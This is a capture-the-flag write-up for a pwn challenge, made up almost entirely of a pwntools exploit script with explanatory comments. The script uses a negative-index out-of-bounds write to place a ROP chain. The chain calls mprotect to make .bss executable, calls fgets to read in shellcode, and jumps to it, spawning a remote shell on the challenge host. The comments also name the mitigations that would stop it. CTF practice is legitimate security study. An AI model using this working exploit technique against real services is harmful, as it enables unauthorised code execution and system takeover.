Tags: pwn
Rating: 1.0
```
from pwn import *
# Target architecture for pwntools helpers (asm()/shellcraft below emit amd64 code).
context.arch = 'amd64'
# Connection to the challenge service; host and port are the page's own values.
p = remote('168.119.108.148', 11010)
def write(index, data):
    """Drive one write operation on the remote service.

    The service is presumed (from the two ":" prompts) to ask first for an
    index and then for the data to store; the index is sent as a decimal
    string and *data* is sent raw, so the caller controls any trailing
    newline.

    NOTE(review): the call with index -2 further down shows the service
    accepting an index outside the 0..2 range used by the first three
    writes. From a defender's view the root cause is an unchecked
    (signed) index; the remediation on the target is a bounds check
    before the array access, not anything in this client.

    Args:
        index: slot number sent to the service; not validated here.
        data:  raw bytes sent after the second prompt.
    """
    p.sendlineafter(":", str(index))
    p.sendafter(":", data)
# Three in-range writes first; their contents (AAAA/BBBB) look like filler,
# presumably to reach the state where the out-of-range write below matters.
write(0, b'AAAA\n')
write(1, b'BBBB\n')
write(2, b'AAAA\n')
# Absolute addresses of functions, data and ROP gadgets. Hard-coded, fixed
# addresses only work if the binary is loaded at a fixed base (non-PIE) and
# the symbols are in the binary itself (statically linked, or the page does
# not show a libc leak) — TODO confirm. PIE plus ASLR would invalidate every
# constant in this list, which is why it is the first mitigation a defender
# would check for on such a target.
mprotect = 0x4080EA
fgets = 0x4019A5
stdin = 0x40C040
bss = 0x000000000040b000
pop_rdi = 0x0000000000401b0d
pop_rsi = 0x00000000004019a3
pop_rdx = 0x0000000000403d23
# One 8-byte zero before the chain; presumably padding up to the saved
# return address — the exact stack layout is not visible here.
payload = p64(0)
# mprotect
# Stage 1: mprotect(bss, 0x10000, 7) — requests PROT_READ|PROT_WRITE|PROT_EXEC
# on a 64 KiB region starting at .bss, turning a data page executable.
# A W^X policy or a seccomp filter denying PROT_EXEC on mprotect would stop
# the chain at this point.
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(pop_rsi)
payload += p64(0x10000)
payload += p64(pop_rdx)
payload += p64(0x7)
payload += p64(mprotect)
# fgets
# Stage 2: fgets(bss + 0x900, 0x80, stdin) — reads up to 0x7f bytes from the
# connection into the now-executable region; the bytes arrive from the
# sendline() below.
payload += p64(pop_rdi)
payload += p64(bss + 0x900)
payload += p64(pop_rsi)
payload += p64(0x80)
payload += p64(pop_rdx)
payload += p64(stdin)
payload += p64(fgets)
# run shellcode
# Stage 3: return into the buffer just filled. The +1 relative to the fgets
# destination is not explained by the script — TODO confirm why entry is at
# bss + 0x901 rather than bss + 0x900.
payload += p64(bss + 0x901)
# Negative index: the out-of-bounds write that places the chain (see the
# note on write()). The chain is sent without a trailing newline.
write(-2, payload)
# Supplies the bytes consumed by the fgets() call in stage 2.
p.sendline(asm(shellcraft.sh()))
p.interactive()
```